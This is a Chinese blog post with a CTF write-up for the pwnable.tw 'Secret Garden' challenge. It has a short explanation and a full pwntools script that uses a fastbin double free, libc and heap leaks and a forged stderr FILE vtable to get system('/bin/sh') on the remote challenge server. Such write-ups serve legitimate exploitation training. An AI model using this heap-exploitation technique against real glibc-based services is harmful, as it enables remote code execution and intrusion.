pwnbale.tw Secret Garden

最新推荐文章于 2021-12-15 03:14:42 发布
最新推荐文章于 2021-12-15 03:14:42 发布
阅读量277 收藏
点赞数
分类专栏: 题目 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/111996221
版权

pwn

思路

我是做了3次double free其实不需要这么多次em,其实可以构造堆块重叠的但是我看可以直接并且远程也很稳定就用double free了,先打malloc_hook打不同(好像可以使用realloc_hook调栈)我的思路是将stderr的flag值写成/bin/sh,虚表写成堆地址然后布置好system在exit函数调用fllush函数的时候触发overflow调用就会调用system("/bin/sh"),shell很稳定不错嘻嘻

from pwn import *
#p=process("./secretgarden")
p=remote('chall.pwnable.tw',10203)
elf=ELF("./secretgarden")
libc=elf.libc
libc=ELF("./libc.so.6")
def menu(idx):
	p.sendlineafter(": ",str(idx))

def add(size,name,colo):
	menu(1)
	p.sendlineafter(":",str(size))
	p.sendafter(":",name)
	p.sendlineafter(':',colo)

def show():
	menu(2)

def delete(idx):
	menu(3)
	p.sendlineafter(":",str(idx))

def clean():
	menu(4)

def ex():
	menu(5)
context.terminal=['tmux','splitw','-h']
add(0x98,'doudou',"doudou")
add(0x18,"emem","emem")
delete(0)
add(0x18,'\x78','\x01')
#gdb.attach(p,'b *$rebase(0x0000F1D)')
show()
libcbase=u64(p.recvuntil("\x7f")[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10
log.success("libcbase: "+hex(libcbase))
malloc_hook=libcbase+libc.sym['__malloc_hook']
one=libcbase+0x45226
system=libcbase+libc.sym['system']
add(0x68,"doudou",'dodou')#3
add(0x68,'doudou2','doudou')#4
delete(3)
delete(4)
delete(3)
IO_list_all=libcbase+libc.sym['_IO_list_all']
bin_sh=libcbase+libc.search("/bin/sh").next()
add(0x68,p64(IO_list_all-0x28+5),'dd')
add(0x68,'dd','dd')
add(0x68,'dd','dd')
payload='\x00'*19+p64(libcbase+libc.sym['_IO_2_1_stderr_'])+p64(0)*3+"/bin/sh\x00"+p64(0)*2+p64(0)*2+p64(0x71)+p64(0)
add(0x68,payload,"dd")
IO_stderr=libcbase+libc.sym['_IO_2_1_stderr_']
delete(3)
delete(4)
delete(3)
add(0x68,p64(IO_stderr+0x20),'dd')
add(0x68,'m','m')
add(0x68,'a','a')
payload='\x00'*0x40+p64(0)+p64(0x71)
add(0x68,payload,'c')
IO_str_jump=libcbase+0x3c37a0
#payload='\x00'*0x58+p64(heap)
delete(3)
delete(4)
show()
p.recvuntil("Name of the flower[10] :")
heap=u64(p.recv(6)+"\x00\x00")+0xc0
log.success("heap: "+hex(heap))
delete(3)
#libc=ELF("./libc.so.6")
add(0x68,p64(IO_stderr+0x70),'a')
add(0x68,p64(0)*3+p64(libcbase+libc.sym['system']),'b')
add(0x68,'c','c')
payload='\x00'*0x58+p64(heap-0x10)
add(0x68,payload,'b')
log.success("libcbase: "+hex(libcbase))
ex()
p.interactive()
doudoudedi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1094
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
Assassins.Creed.III.TW.THETA.RIP.torrent
07-20
Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME.Assassins.Creed.III.TW.THETA.RIP.torrent3DMGAME....
twsecret garden
weixin_43960998的博客
02-21 145
程序和思路 delete 功能只 free 了 name 的堆块,并且 free 的 if 并没有检查 *v1,所以可以 double free: add 的时候 name 的大小也无限制。所以可以直接 free 进 unsorted bin 然后 申请出来泄漏 libc,接着 double free 打 malloc_hook ,但是 one_gadget 条件不满足所以通过触发 malloc_printerr 来触发。 完整exp #encoding=utf-8 from pwn import *
[BUUCTF-pwn] pwnable_secret_garden
weixin_52640415的博客
11-26 670
这个题本身没有难度,小难点在one_gadget+realloc偏移 堆题全保护就不用说了,漏洞在free时没有删指针 int m3free() { int result; // eax _DWORD *v1; // rax unsigned int v2; // [rsp+4h] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+8h] [rbp-10h] v3 = __readfsqword(0x28u); if ( !unk_20
hitcon lab1-lab14
Maxmalloc的博客
12-23 1118
lab 1 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=0840aeca8337fc97ba1134067d05ee2563b3f4ce, not st...
android台湾 apk.tw,台湾SWAG app
热门推荐
weixin_42525637的博客
05-28 2万+
台湾SWAG app是一款十分安全靠谱高品质交友的社交软件,平台有非常多颜值超高的男男女女,在线可以便捷的认识与自己有缘的好友,线上交友互动有趣,聊天有丰富的话题可以说,平台也会提供丰富的各种话题,参与话题与线上的其他用户认识,让一段缘分就此展开,不仅可以认识同城的好友,还可以认识全世界有缘分的好友,认识各种有趣的小伙伴,还可以查看各种好友每天的动态。台湾SWAG app 特色:1、在线的用户提供...
pwnable.tw - start
不急不躁
07-08 4148
首先安装 pwntools,在执行pip install --upgrade pwntools时出错 cannot import name main 要修改 /usr/bin/pip from pip import main 为 from pip import __main__ sys.exit(__main__._main()) 再次执行即可 安装 peda git cl...
【转】Chromium设置默认的搜索引擎为google.com.tw
上帝已逝,自求多福
01-29 4886
最近google.cn & google.com 经常被墙,搞得看着看着就被重置了,使用起来很是麻烦。 我是使用chrome/界面的搜索直接搜索的。 但是发现google.com.tw并没有被封,也不会出现重置的问题,所以可以把默认浏览器的搜索引擎换成google.com.tw来解决被重置的问题。 下面是chrom的设置: 选项->搜索引擎管理->添加-> 名称就写gogoleT
matlab分频.m,分频器m是什么意思 音响分频器m. TW那个代表高音那个代表是低音?...
weixin_29234509的博客
03-17 1万+
音响分频器m. TW那个代表高音那个代表是低音?T是treble 的缩写,指高音;M是mediant或middle的缩写,指中音;W是woof的缩写,指低音。音箱分频器m-m 什么意思?音箱分频器m- m 应该是接中音喇叭负、正两端。T 、T-接高音喇叭正、负端。W 、W-接低音喇叭正、负端。IN 、IN-接功放输出正、负口。请问汽车音响套装喇叭分音频,高低音怎么分,英文字母,功放可以带全车喇叭吗...
.SCI-HUB搜索引擎(强大无比,只要有网就能下载你要的文献,无需购买数据库)http://sci-hub.tw/
SN的博客
03-16 8706
https://baijiahao.baidu.com/s?id=1616563875440376059&wfr=spider&for=pc 特别推荐:.SCI-HUB搜索引擎(强大无比,只要有网就能下载你要的文献,无需购买数据库)http://sci-hub.tw/ ...
apk.tw_IDPhoto_Premium_v8.3.9.apk
最新发布
09-08
apk.tw_IDPhoto_Premium_v8.3.9.apk
apk.tw_LineLite_v8a_v.2.17.1_sign.apk
04-24
apk.tw_LineLite_v8a_v.2.17.1_sign.apk
ha2.tw
03-28
ha2.tw 项目设置 npm install 编译和热重装以进行开发 npm run serve 编译并最小化生产 npm run build 整理和修复文件 npm run lint 自定义配置 请参阅。
dev:dev.g0v.tw
03-07
dev:dev.g0v.tw
net.ipv4.tcp_tw_reuse是干嘛的?
豌豆的博客
12-15 6386
文章目录前言准备工作sd01的配置sd02的配置开始测试关闭net.ipv4.tcp_tw_reuse打开net.ipv4.tcp_tw_reuse关闭客户端的net.ipv4.tcp_timestamps关闭服务器端的net.ipv4.tcp_timestampsreuse的握手过程和正常握手是一样的吗?总结 前言 昨天萌新学习了net.ipv4.ip_local_port_range参数的作用,今天再来学习一下net.ipv4.tcp_tw_reuse这个参数。 ​ 下面是萌新测试环境的系统和内核版本
xctf ics-05 wp
doudoudedi
06-18 2729
今天刚考完数据库就来刷体了很累所以做了很久 诶还是不够仔细啊没有认真的做出来 应该直接想到任意文件读取的诶 page=php://filter/read=convert.base64-encode/resource=index.php 爆出源码: <?php error_reporting(0); @session_start(); posix_setui...
记一道简单的RIP覆盖的pwn(远程的话因为ubuntu18缘故所以栈需要对齐)
doudoudedi
06-03 2689
记一道BUUCTF简单的RIP覆盖的pwn 这个题目就是单纯的RIP覆盖 直接打开64位IDA 直接就有shell可以直接利用 然后就是算偏移了 直接用gdb-peda的工具算出偏移为23 直接上exp: from pwn import * p=remote('buuoj.cn',6001) system=0x401186 payload='a'*23+p64(system) p.sendl...
开发Internet Explorer右键菜单:0rz.tw缩网址示例
本文档详细介绍了如何在Internet Explorer浏览器中自定义右键功能表(ContextMenu),以0rz.tw的缩网址功能为例进行说明。在开发过程中,关键步骤包括以下几个方面: 1. 注册表结构:Internet Explorer的右键菜单...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值